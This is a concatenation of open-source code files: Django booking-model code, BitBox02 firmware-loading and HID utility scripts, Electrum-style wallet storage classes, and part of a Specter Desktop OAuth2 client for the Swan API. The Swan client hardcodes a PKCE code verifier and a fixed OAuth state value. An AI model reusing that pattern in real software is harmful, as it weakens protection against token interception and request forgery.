'4_deny': _(u'La modération a été refusée. Le véhicule n\'était probablement pas disponible.'),
}
def build_form_validation(request, obj):
from vehicles.models import Location
class FormValidation(forms.Form):
remark_agepoly = forms.CharField(label=_('Remarque'), widget=forms.Textarea, required=False)
card = forms.ModelChoiceField(label=_(u'Carte'), queryset=obj.provider.get_cards(), required=False)
location = forms.ModelChoiceField(label=_(u'Lieu'), queryset=Location.objects.filter(deleted=False).order_by('name'), required=False)
return FormValidation
states_bonus_form = {
'2_online': build_form_validation
}
def switch_status_signal(self, request, old_status, dest_status):
from vehicles.models import Location, Card
if dest_status == '2_online':
if request.POST.get('remark_agepoly'):
if self.remark_agepoly:
self.remark_agepoly += '\n' + request.POST.get('remark_agepoly')
else:
self.remark_agepoly = request.POST.get('remark_agepoly')
self.save()
if request.POST.get('card'):
self.card = get_object_or_404(Card, pk=request.POST.get('card'), provider=self.provider, deleted=False)
self.save()
if request.POST.get('location'):
self.location = get_object_or_404(Location, pk=request.POST.get('location'), deleted=False)
self.save()
s = super(_Booking, self)
if hasattr(s, 'switch_status_signal'):
s.switch_status_signal(request, old_status, dest_status)
class Meta:
abstract = True
def __unicode__(self):
return self.title
def get_location(self):
if self.location:
if self.location.url_location:
return u'<a href="{}">{}</a>'.format(self.location.url_location, self.location)
else:
return self.location.__unicode__()
else:
return ''
def genericFormExtraInit(self, form, current_user, *args, **kwargs):
"""Remove fields that should be edited by SECRETARIAT CDD only."""
if not self.rights_in_root_unit(current_user, 'SECRETARIAT'):
del form.fields['card']
del form.fields['location']
del form.fields['remark_agepoly']
unit_users_pk = map(lambda user: user.pk, self.unit.users_with_access())
form.fields['responsible'].queryset = TruffeUser.objects.filter(pk__in=unit_users_pk).order_by('first_name', 'last_name')
def genericFormExtraClean(self, data, form):
if 'provider' in data:
if 'card' in data and data['card']:
if data['card'].provider != data['provider']:
raise forms.ValidationError(_(u'La carte n\'est pas lié au fournisseur sélectionné'))
if 'vehiculetype' in data and data['vehiculetype']:
if data['vehiculetype'].provider != data['provider']:
raise forms.ValidationError(_(u'Le type de véhicule n\'est pas lié au fournisseur sélectionné'))
def conflicting_reservation(self):
return self.__class__.objects.exclude(pk=self.pk, deleted=True).filter(status__in=['2_online'], end_date__gt=self.start_date, start_date__lt=self.end_date)
``` |
{
"source": "jonathancross/bitbox02-firmware",
"score": 2
} |
#### File: py/bitbox02/devices.py
```python
import re
from typing import List
from typing_extensions import TypedDict
import hid
import semver
BB02_BOOTLOADER = "bb02-bootloader"
BB02BTC_BOOTLOADER = "bb02btc-bootloader"
BITBOX02 = "BitBox02"
class DeviceInfo(TypedDict):
serial_number: str
path: bytes
product_string: str
def get_bitbox02_devices(product_string: str = BITBOX02) -> List[DeviceInfo]:
"""
Scans devices and returns a list of hid device info objects.
"""
# TODO: product id is 0x2403, but 0x2402 is the id of some dev
# device bootloaders. Can be removed in time, not needed for
# production devices.
return [
info
for info in hid.enumerate()
if info["vendor_id"] == 0x03EB
and info["product_id"] in (0x2402, 0x2403)
and (info["usage_page"] == 0xFFFF or info["interface_number"] == 0)
and info["product_string"] == product_string
]
def parse_device_version(serial_number: str) -> semver.VersionInfo:
match = re.search(r"v([0-9]+\.[0-9]+\.[0-9]+.*)", serial_number)
if match is None:
return None
return semver.VersionInfo.parse(match.group(1))
```
#### File: bitbox02-firmware/py/load_firmware.py
```python
import sys
import pprint
from typing import Any, List
from time import sleep
from bitbox02 import devices
from bitbox02 import Bootloader, BitBox02
def eprint(*args: Any, **kwargs: Any) -> None:
"""
Like print, but defaults to stderr.
"""
kwargs.setdefault("file", sys.stderr)
print(*args, **kwargs)
def main() -> int:
"""Main function"""
debug = len(sys.argv) == 3 and sys.argv[2] == "debug"
if not (len(sys.argv) == 2 or debug):
eprint("\n\nUsage:\n\tpython load_firmware.py firmware_name.bin [debug]")
eprint(
"\tif debug is specified, the firmware should be unsigned, otherwise it "
"should be signed."
)
return 1
filename = sys.argv[1]
if not debug and ".signed.bin" not in filename:
eprint("Expecting signed firmware")
return 1
bootloaders = devices.get_bitbox02_devices(devices.BB02_BOOTLOADER)
bootloaders.extend(devices.get_bitbox02_devices(devices.BB02BTC_BOOTLOADER))
bitboxes = devices.get_bitbox02_devices()
def _wait_for_bootloaders() -> List[devices.DeviceInfo]:
while True:
bootloaders = devices.get_bitbox02_devices(devices.BB02_BOOTLOADER)
bootloaders.extend(devices.get_bitbox02_devices(devices.BB02BTC_BOOTLOADER))
if bootloaders:
return bootloaders
sys.stdout.write(".")
sleep(1)
if not bootloaders:
if len(bitboxes) != 1:
eprint(
"No bitbox02 bootloader detected. Insert exactly one bootloader or "
"bitbox02 device."
)
return 1
# bitbox02 detected -> send command to reboot into bootloader to upgrade.
def show_pairing(code: str) -> None:
eprint("Please compare and confirm the pairing code on your BitBox02:")
eprint(code)
bitbox = BitBox02(device_info=bitboxes[0], show_pairing_callback=show_pairing)
bitbox.reboot()
bootloaders = _wait_for_bootloaders()
if len(bootloaders) > 1:
eprint("Multiple bootloaders detected. Only one supported")
return 1
pprint.pprint(bootloaders[0])
bootloader = Bootloader(bootloaders[0])
with open(filename, "rb") as file:
firmware = file.read()
def progress(perc: float) -> None:
sys.stdout.write(f"{perc*100:.02f}%\r")
if bootloader.erased():
print("device contains NO firmware")
else:
print("firmware version: %d\nsigning pubkeys version: %d" % bootloader.versions())
firmware_hash, signing_keydata_hash = bootloader.get_hashes()
print("firmware hash:", firmware_hash.hex())
print("signing keydata hash:", signing_keydata_hash.hex())
if debug:
bootloader.flash_unsigned_firmware(firmware, progress)
else:
bootloader.flash_signed_firmware(firmware, progress)
print() # print a newline
sleep(1) # Pause to show the upgrade finished at 100%
bootloader.reboot()
return 0
if __name__ == "__main__":
sys.exit(main())
```
#### File: py/old/dbb_utils.py
```python
import os
import sys
import json
import base64
import pyaes
import hid # hidapi (requires cython)
import hashlib
import struct
import time
import binascii
# ----------------------------------------------------------------------------------
#
# TODO: update accordingly
v2_serial_number = "dbb.fw:v0.0.1"
applen_v2 = 0xF0000 # BitBox_v2 firmware size
applen_v1 = 0x37000 # BitBox_v1 firmware size
chunksize = 8*512
usb_report_size = 64 # firmware > v2.0
# v1 size for boot commands:
boot_buf_size_send = 4098
boot_buf_size_reply = 256
class Usage:
"""The USB usage"""
interface = 1
usage_page = 0xFFFF
def __init__(self, interface, usage_page):
self.interface = interface
self.usage_page = usage_page
USB_HWW = Usage(0, 0xFFFF)
USB_U2F = Usage(1, 0xD0F1)
# ----------------------------------------------------------------------------------
# Crypto
#
def aes_encrypt_with_iv(key, iv, data):
aes_cbc = pyaes.AESModeOfOperationCBC(key, iv=iv)
aes = pyaes.Encrypter(aes_cbc)
e = aes.feed(data) + aes.feed() # empty aes.feed() appends pkcs padding
return e
def aes_decrypt_with_iv(key, iv, data):
aes_cbc = pyaes.AESModeOfOperationCBC(key, iv=iv)
aes = pyaes.Decrypter(aes_cbc)
s = aes.feed(data) + aes.feed() # empty aes.feed() strips pkcs padding
return s
def EncodeAES(secret, s):
iv = bytes(os.urandom(16))
ct = aes_encrypt_with_iv(secret, iv, s)
e = iv + ct
return base64.b64encode(e)
def DecodeAES(secret, e):
e = bytes(base64.b64decode(e))
iv, e = e[:16], e[16:]
s = aes_decrypt_with_iv(secret, iv, e)
return s
def sha256(x):
return hashlib.sha256(x).digest()
def Hash(x):
if type(x) is bytes: return sha256(sha256(x))
if type(x) is not bytearray: x=x.encode('utf-8')
return sha256(sha256(x))
# ----------------------------------------------------------------------------------
# HID
#
def getHidPath(usage):
for d in hid.enumerate(0, 0):
if d['vendor_id'] == 0x03eb and d['product_id'] in (0x2402, 0x2403):
if d['interface_number'] == usage.interface or d['usage_page'] == usage.usage_page:
# hidapi is not consistent across platforms
# usage_page works on Windows/Mac; interface_number works on Linux
return d['path']
dbb_hid = hid.device()
dbb_version = None;
def identifyVersion():
global dbb_version
serial_number = dbb_hid.get_serial_number_string()
if serial_number == v2_serial_number:
dbb_version = 2
else:
dbb_version = 1
def openHid():
openSpecificHid(USB_HWW)
def closeHid():
dbb_hid.close();
def openSpecificHid(usage):
print("\nOpening device")
try:
dbb_hid.open_path(getHidPath(usage))
print("\tManufacturer: %s" % dbb_hid.get_manufacturer_string())
print("\tProduct: %s" % dbb_hid.get_product_string())
print("\tSerial No: %s\n\n" % dbb_hid.get_serial_number_string())
identifyVersion()
print("\tBitBox Version No: %s\n\n" % dbb_version)
except Exception as e:
print("\nDevice not found: (%s)\n" % str(e))
sys.exit()
# ----------------------------------------------------------------------------------
# ISO 7816-4
#
HWW_CID = 0xFF000000
HWW_CMD = 0x80 + 0x40 + 0x01
U2F_PING_CMD = 0x80 + 0x01
def hid_send_frames(cmd, data):
data = bytearray(data)
data_len = len(data)
seq = 0;
idx = 0;
write = []
while idx < data_len:
if idx == 0:
# INIT frame
write = data[idx : idx + min(data_len, usb_report_size - 7)]
dbb_hid.write(b'\0' + struct.pack(">IBH",HWW_CID, cmd, data_len & 0xFFFF) + write + b'\xEE' * (usb_report_size - 7 - len(write)))
else:
# CONT frame
write = data[idx : idx + min(data_len, usb_report_size - 5)]
dbb_hid.write(b'\0' + struct.pack(">IB", HWW_CID, seq) + write + b'\xEE' * (usb_report_size - 5 - len(write)))
seq += 1
idx += len(write)
def hid_read_frames(cmd=HWW_CMD, timeout=5):
# INIT response
if timeout is None:
timeout = 30;
timeout_ms = timeout * 1000
read = dbb_hid.read(usb_report_size, timeout_ms)
if len(read) >= 3:
cid = ((read[0] * 256 + read[1]) * 256 + read[2]) * 256 + read[3]
reply_cmd = read[4]
data_len = read[5] * 256 + read[6]
data = read[7:]
idx = len(read) - 7;
while idx < data_len:
# CONT response
read = dbb_hid.read(usb_report_size, timeout_ms)
if len(read) < 3:
raise Exception('Did not receive a continuation frame after %d seconds' % timeout)
data += read[5:]
idx += len(read) - 5
assert cid == HWW_CID, '- USB command ID mismatch'
assert reply_cmd == cmd, '- USB command frame mismatch'
return data
else:
raise Exception('Did not read anything after %d seconds' % timeout)
# ----------------------------------------------------------------------------------
# Firmware API (keep consistent with the Electrum plugin)
#
def hid_read(cmd=HWW_CMD, timeout=None):
try:
reply = hid_read_frames(cmd, timeout)
reply = bytearray(reply).rstrip(b' \t\r\n\0')
except Exception as e:
reply = ''
print('Exception caught: ' + str(e))
return reply
def hid_read_json(timeout=None):
try:
r = hid_read(HWW_CMD, timeout)
r = ''.join(chr(e) for e in r)
reply = json.loads(r)
print("JSON: {}".format(reply))
except Exception as e:
reply = ''
print('Exception caught: ' + str(e))
return reply
def hid_send_msg(msg, cmd=HWW_CMD):
if type(msg) == str:
msg = msg.encode()
try:
serial_number = dbb_hid.get_serial_number_string()
if serial_number == "dbb.fw:v2.0.0" or serial_number == "dbb.fw:v1.3.2" or serial_number == "dbb.fw:v1.3.1":
print('Please upgrade your firmware: digitalbitbox.com/firmware')
sys.exit()
hid_send_frames(cmd, msg)
except Exception as e:
print('Exception caught: ' + str(e))
def hid_send_and_read(msg, timeout=None):
hid_send_msg(msg)
return hid_read(HWW_CMD, timeout)
def hid_send_and_read_json(msg, timeout=None):
hid_send_msg(msg)
return hid_read_json(timeout)
def hid_send_encrypt(msg, password, timeout=None):
print("Sending: {}".format(msg))
reply = ""
try:
secret = Hash(password)
msg = EncodeAES(secret, msg)
reply = hid_send_and_read_json(msg, timeout)
if 'ciphertext' in reply:
reply = DecodeAES(secret, ''.join(reply["ciphertext"]))
print("Reply: {}\n".format(reply))
reply = json.loads(reply)
if 'error' in reply:
password = <PASSWORD>
print("\n\nReply: {}\n\n".format(reply))
except Exception as e:
print('Exception caught ' + str(e))
return reply
# ----------------------------------------------------------------------------------
# Bootloader API
#
def sendBoot(msg, timeout=None):
if dbb_version == 2:
hid_send_frames(HWW_CMD, bytearray(msg))
reply = bytes(hid_read_frames(HWW_CMD, timeout))
#reply = ''.join(chr(e) for e in reply)
elif dbb_version == 1:
msg = bytearray(msg) + b'\0' * (boot_buf_size_send - len(msg))
dbb_hid.write(b'\0' + msg)
reply = []
while len(reply) < boot_buf_size_reply:
reply = reply + dbb_hid.read(boot_buf_size_reply)
reply = bytearray(reply).rstrip(b' \t\r\n\0')
reply = ''.join(chr(e) for e in reply)
else:
print("\nBootloader version error\n\n")
sys.exit()
return reply
def sendPlainBoot(msg):
try:
print("\nSending: {}".format(msg[:2]))
reply = sendBoot(msg)
if msg.startswith(b's'):
print("Reply: {} {} (firmware hash)\n".format(reply[:2], binascii.hexlify(reply[2:34])))
else:
print("Reply: {} {}\n".format(reply[:2], reply[2:]))
return reply
except Exception as e:
print('Exception caught ' + str(e))
return "";
def sendChunk(chunknum, data):
try:
# \x77 = 'w'
b = bytearray(b"\x77\x00")
b[1] = chunknum % 0xFF
b.extend(data)
reply = sendBoot(b)
print("Loaded: {} Code: {}".format(chunknum, reply))
except Exception as e:
print('Exception caught ' + str(e))
def sendBin(filename):
with open(filename, "rb") as f:
cnt = 0
while True:
data = f.read(chunksize)
if len(data) == 0:
break
sendChunk(cnt, data)
cnt += 1
```
#### File: py/old/old_load_firmware.py
```python
import sys
import binascii
from dbb_utils import *
if len(sys.argv) is not 3:
print('\n\nUsage:\n\tpython load_firmware.py firmware_name.bin firmware_version\n\n')
sys.exit()
else:
fn = sys.argv[1]
version = sys.argv[2]
# Private key signatures (order is important)
if 'signed' in fn:
print('\n\nPlease load the unsigned firmware binfile. Signatures are added within this script.\n\n')
sys.exit()
elif version:
sig = (
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
)
else:
print('\n\nError: invalid firmware version ({}). Use the form \'vX.X.X\'\n\n'.format(version))
sys.exit()
def printFirmwareHash(filename):
with open(filename, "rb") as f:
data = f.read()
applen = applen_v2 if version == 2 else applen_v1
data += b'\xFF' * (applen - len(data))
print('\nHashed firmware', binascii.hexlify(Hash(data)))
# ----------------------------------------------------------------------------------
try:
openHid()
printFirmwareHash(fn)
sendPlainBoot(b'b') # blink led
sendPlainBoot(b'v') # bootloader version
sendPlainBoot(b'e') # erase existing firmware (required)
sendBin(fn) # send new firmware
# upload sigs and verify new firmware
load_result = sendPlainBoot(b's\0' + binascii.unhexlify(sig))
if load_result[1] == 'V':
latest_version, = struct.unpack('>I', binascii.unhexlify(load_result[2+64:][:8]))
app_version, = struct.unpack('>I', binascii.unhexlify(load_result[2+64+8:][:8]))
print('ERROR: firmware downgrade not allowed. Got version %d, but must be equal or higher to %d' % (app_version, latest_version))
elif load_result[1] != b'0'[0]:
print('ERROR: invalid firmware signature\n\n')
else:
print('SUCCESS: valid firmware signature\n\n')
sendPlainBoot(b'r') # reboot
except IOError as ex:
print(ex)
except (KeyboardInterrupt, SystemExit):
print('Exiting code')
``` |
{
"source": "jonathancross/p2wpkh-in-p2sh",
"score": 2
} |
#### File: p2wpkh-in-p2sh/lib/storage.py
```python
import os
import threading
import json
import copy
import stat
import pbkdf2, hmac, hashlib
import base64
import zlib
from .util import PrintError
from . import bitcoin
# seed_version is now used for the version of the wallet file
FINAL_SEED_VERSION = 16 # electrum >= 2.7 will set this to prevent
# old versions from overwriting new format
class WalletStorage(PrintError):
def __init__(self, path):
self.lock = threading.RLock()
self.data = {}
self.path = path
self.modified = False
self.pubkey = None
if self.file_exists():
with open(self.path, "r") as f:
self.raw = f.read()
if not self.is_encrypted():
self.load_data(self.raw)
else:
# avoid new wallets getting 'upgraded'
self.put('seed_version', FINAL_SEED_VERSION)
def is_encrypted(self):
try:
return base64.b64decode(self.raw)[0:4] == b'BIE1'
except:
return False
def file_exists(self):
return self.path and os.path.exists(self.path)
def get_key(self, password):
secret = pbkdf2.PBKDF2(password, '', iterations = 1024, macmodule = hmac, digestmodule = hashlib.sha512).read(64)
ec_key = bitcoin.EC_KEY(secret)
return ec_key
def set_password(self, password, encrypt):
self.put('use_encryption', bool(password))
if encrypt and password:
ec_key = self.get_key(password)
self.pubkey = ec_key.get_public_key()
else:
self.pubkey = None
def get(self, key, default=None):
with self.lock:
v = self.data.get(key)
if v is None:
v = default
else:
v = copy.deepcopy(v)
return v
def put(self, key, value):
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error("json error: cannot save", key)
return
with self.lock:
if value is not None:
if self.data.get(key) != value:
self.modified = True
self.data[key] = copy.deepcopy(value)
elif key in self.data:
self.modified = True
self.data.pop(key)
def write(self):
with self.lock:
self._write()
def _write(self):
if threading.currentThread().isDaemon():
self.print_error('warning: daemon thread cannot write wallet')
return
if not self.modified:
return
s = json.dumps(self.data, indent=4, sort_keys=True)
if self.pubkey:
s = bytes(s, 'utf8')
c = zlib.compress(s)
s = bitcoin.encrypt_message(c, self.pubkey)
s = s.decode('utf8')
temp_path = "%s.tmp.%s" % (self.path, os.getpid())
with open(temp_path, "w") as f:
f.write(s)
f.flush()
os.fsync(f.fileno())
mode = os.stat(self.path).st_mode if os.path.exists(self.path) else stat.S_IREAD | stat.S_IWRITE
# perform atomic write on POSIX systems
try:
os.rename(temp_path, self.path)
except:
os.remove(self.path)
os.rename(temp_path, self.path)
os.chmod(self.path, mode)
self.print_error("saved", self.path)
self.modified = False
```
#### File: p2wpkh-in-p2sh/lib/wallet.py
```python
import os
import threading
import json
import copy
from .util import PrintError
from .bitcoin import *
from .keystore import load_keystore
from . import bitcoin
class Abstract_Wallet(PrintError):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
def __init__(self, storage):
self.storage = storage
self.network = None
self.gap_limit_for_change = 6 # constant
# saved fields
self.history = storage.get('addr_history',{}) # address -> list(txid, height)
self.load_keystore()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.lock = threading.Lock()
self.transaction_lock = threading.Lock()
self.check_history()
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_transactions(self):
self.txi = self.storage.get('txi', {})
self.txo = self.storage.get('txo', {})
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if self.txi.get(tx_hash) is None and self.txo.get(tx_hash) is None and (tx_hash not in self.pruned_txo.values()):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
def save_transactions(self, write=False):
with self.transaction_lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
self.storage.put('txi', self.txi)
self.storage.put('txo', self.txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
self.storage.put('addr_history', self.history)
if write:
self.storage.write()
def build_reverse_history(self):
self.tx_addr_hist = {}
for addr, hist in self.history.items():
for tx_hash, h in hist:
s = self.tx_addr_hist.get(tx_hash, set())
s.add(addr)
self.tx_addr_hist[tx_hash] = s
def check_history(self):
save = False
mine_addrs = list(filter(lambda k: self.is_mine(self.history[k]), self.history.keys()))
if len(mine_addrs) != len(self.history.keys()):
save = True
for addr in mine_addrs:
hist = self.history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo.values() or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
self.storage.put('addresses', {'receiving':self.receiving_addresses, 'change':self.change_addresses})
def load_addresses(self):
d = self.storage.get('addresses', {})
if type(d) != dict: d={}
self.receiving_addresses = d.get('receiving', [])
self.change_addresses = d.get('change', [])
def synchronize(self):
pass
def is_mine(self, address):
return address in self.get_addresses()
def get_address_index(self, address):
if address in self.receiving_addresses:
return False, self.receiving_addresses.index(address)
if address in self.change_addresses:
return True, self.change_addresses.index(address)
raise Exception("Address not found", address)
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
# return the total amount ever received by an address
# return the balance of a bitcoin address: confirmed and matured, unconfirmed, unmatured
def get_addresses(self):
out = []
out += self.get_receiving_addresses()
out += self.get_change_addresses()
return out
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def address_is_old(self, address, age_limit=2):
age = -1
h = self.history.get(address, [])
for tx_hash, tx_height in h:
if tx_height == 0:
tx_age = 0
else:
tx_age = self.get_local_height() - tx_height + 1
if tx_age > age:
age = tx_age
return age > age_limit
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
if k.can_sign(tx):
return True
return False
def add_address(self, address):
if address not in self.history:
self.history[address] = []
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def is_deterministic(self):
return self.keystore.is_deterministic()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def create_new_address(self, for_change=False):
assert type(for_change) is bool
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change)
continue
if list(map(lambda a: self.address_is_old(a), addresses[-limit:] )) == limit*[False]:
break
else:
self.create_new_address(for_change)
def synchronize(self):
with self.lock:
if self.is_deterministic():
self.synchronize_sequence(False)
self.synchronize_sequence(True)
else:
if len(self.receiving_addresses) != len(self.keystore.keypairs):
pubkeys = self.keystore.keypairs.keys()
self.receiving_addresses = [self.pubkeys_to_address(i) for i in pubkeys]
self.save_addresses()
for addr in self.receiving_addresses:
self.add_address(addr)
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return bitcoin.pubkey_to_address(self.txin_type, pubkey)
``` |
{
"source": "jonathancross/specter-desktop",
"score": 2
} |
#### File: services/swan/client.py
```python
import base64
import datetime
import hashlib
import json
import logging
import secrets
from decimal import Decimal
from os import access
from typing import List
from urllib import request
from urllib.parse import urlparse
import pytz
import requests
from flask import current_app as app
from flask_babel import lazy_gettext as _
logger = logging.getLogger(__name__)
# TODO: Update with prod values
code_verifier = "<KEY>"
class SwanApiException(Exception):
pass
class SwanApiRefreshTokenException(SwanApiException):
pass
class SwanClient:
def __init__(
self, hostname, access_token: str, access_token_expires, refresh_token
):
self.hostname = hostname
self.access_token: str = str(
access_token
) # The ServiceSwan storage might have one in its storage
self.access_token_expires = (
access_token_expires # a timestamp when the access token will expire
)
self.refresh_token = refresh_token
self.api_url = app.config.get("SWAN_API_URL")
self.client_id = app.config.get("SWAN_CLIENT_ID")
self.client_secret = app.config.get("SWAN_CLIENT_SECRET")
def is_access_token_valid(self):
return (
self.access_token_expires > datetime.datetime.now(tz=pytz.utc).timestamp()
)
def calc_callback_url(self):
return f"http://{ self.hostname }{app.config['APP_URL_PREFIX']}{app.config['EXT_URL_PREFIX']}/swan/oauth2/callback"
def get_oauth2_start_url(self, callback_hostname):
"""
Set up the Swan API integration by requesting our initial access_token and
refresh_token.
"""
# Let's start the PKCE-flow
global code_verifier
self.hostname = callback_hostname
if code_verifier is None:
code_verifier = secrets.token_urlsafe(43)
# see specification: https://datatracker.ietf.org/doc/html/rfc7636#section-4.2
# and example impl: https://github.com/RomeoDespres/pkce/blob/master/pkce/__init__.py#L94-L96
hashed = hashlib.sha256(code_verifier.encode("ascii")).digest()
encoded = base64.urlsafe_b64encode(hashed)
code_challenge = encoded.decode("ascii")[:-1]
flow_url = f"{self.api_url}/oidc/auth?"
query_params = [
f"client_id={self.client_id}",
f"redirect_uri={self.calc_callback_url()}",
"response_type=code",
"response_mode=query",
f"code_challenge={code_challenge}",
"code_challenge_method=S256",
"state=kjkmdskdmsmmsmdslmdlsm",
"scope=offline_access v1 write:vendor_wallet read:vendor_wallet write:automatic_withdrawal read:automatic_withdrawal",
"prompt=consent",
]
flow_url += "&".join(query_params)
return flow_url
def _get_access_token(
self, code: str = None, code_verifier: str = None, request_uri=None
) -> str:
"""
If code and code_verifier are specified, this is our initial request for an
access_token and, more importantly, the refresh_token.
If code is None, use the refresh_token to get a new short-lived access_token.
If we don't have the refresh_token, raise SwanApiRefreshTokenException.
"""
# Must explicitly set User-Agent; Swan firewall blocks all requests with "python".
auth_header = {"User-Agent": "Specter Desktop"}
if code:
# Requesting initial refresh_token and access_token
payload = {
"client_id": self.client_id,
"client_secret": self.client_secret,
"code_verifier": code_verifier,
"grant_type": "authorization_code",
"state": "kjkmdskdmsmmsmdslmdlsm",
"code": code,
"redirect_uri": request_uri,
}
else:
if self.is_access_token_valid():
return self.access_token
# Use the refresh_token to get a new access_token
if not self.refresh_token:
raise SwanApiRefreshTokenException(
"access_token is expired but we don't have a refresh_token"
)
payload = {
"grant_type": "refresh_token",
# "redirect_uri": # Necessary? Probably yes but more difficult to reconstruct it but the refresh-token is not yet used anyway
"refresh_token": self.refresh_token,
"scope": "offline_access v1 write:vendor_wallet read:vendor_wallet write:automatic_withdrawal read:automatic_withdrawal",
}
auth_hash = base64.b64encode(
f"{self.client_id}:{self.client_secret}".encode()
).decode()
auth_header["Authorization"] = f"Basic {auth_hash}"
response = requests.post(
f"{self.api_url}/oidc/token",
data=payload,
headers=auth_header,
)
resp = json.loads(response.text)
"""
{
"access_token": "***************",
"expires_in": 3600,
"refresh_token": "***************",
"scope": "offline_access v1 write:vendor_wallet read:vendor_wallet write:automatic_withdrawal read:automatic_withdrawal",
"token_type": "Bearer"
}
"""
if resp.get("access_token"):
self.access_token = resp.get("access_token")
self.access_token_expires = (
datetime.datetime.now(tz=pytz.utc)
+ datetime.timedelta(seconds=resp["expires_in"])
).timestamp()
self.refresh_token = resp.get("refresh_token")
return self.access_token
else:
logger.warning(response)
raise SwanApiException(response.text)
def handle_oauth2_auth_callback(self, request):
code = request.args.get("code")
rp = urlparse(request.url)
request_uri = f"{rp.scheme}://{rp.netloc}{rp.path}"
self._get_access_token(
code=code, code_verifier=code_verifier, request_uri=request_uri
)
def authenticated_request(
self, endpoint: str, method: str = "GET", json_payload: dict = {}
) -> dict:
logger.debug(f"{method} endpoint: {endpoint}")
access_token = self._get_access_token()
# Must explicitly set User-Agent; Swan firewall blocks all requests with "python".
auth_header = {
"User-Agent": "Specter Desktop",
"Authorization": f"Bearer {access_token}",
}
try:
if method == "GET":
response = requests.get(self.api_url + endpoint, headers=auth_header)
elif method in ["POST", "PATCH", "PUT", "DELETE"]:
response = requests.request(
method=method,
url=self.api_url + endpoint,
headers=auth_header,
json=json_payload,
)
if response.status_code != 200:
raise SwanApiException(f"{response.status_code}: {response.text}")
return response.json()
except Exception as e:
# TODO: tighten up expected Exceptions
logger.exception(e)
logger.error(
f"endpoint: {self.api_url}{endpoint} | method: {method} | payload: {json.dumps(json_payload, indent=4)}"
)
logger.error(f"{response.status_code}: {response.text}")
raise e
def get_autowithdrawal_addresses(self, swan_wallet_id: str) -> dict:
"""
{
"entity": "wallet",
"item": {
"id": "c47e1e83-90a0-45da-ae25-6a0d324b9f29",
"isConfirmed": false,
"displayName": "Specter autowithdrawal to SeedSigner demo",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
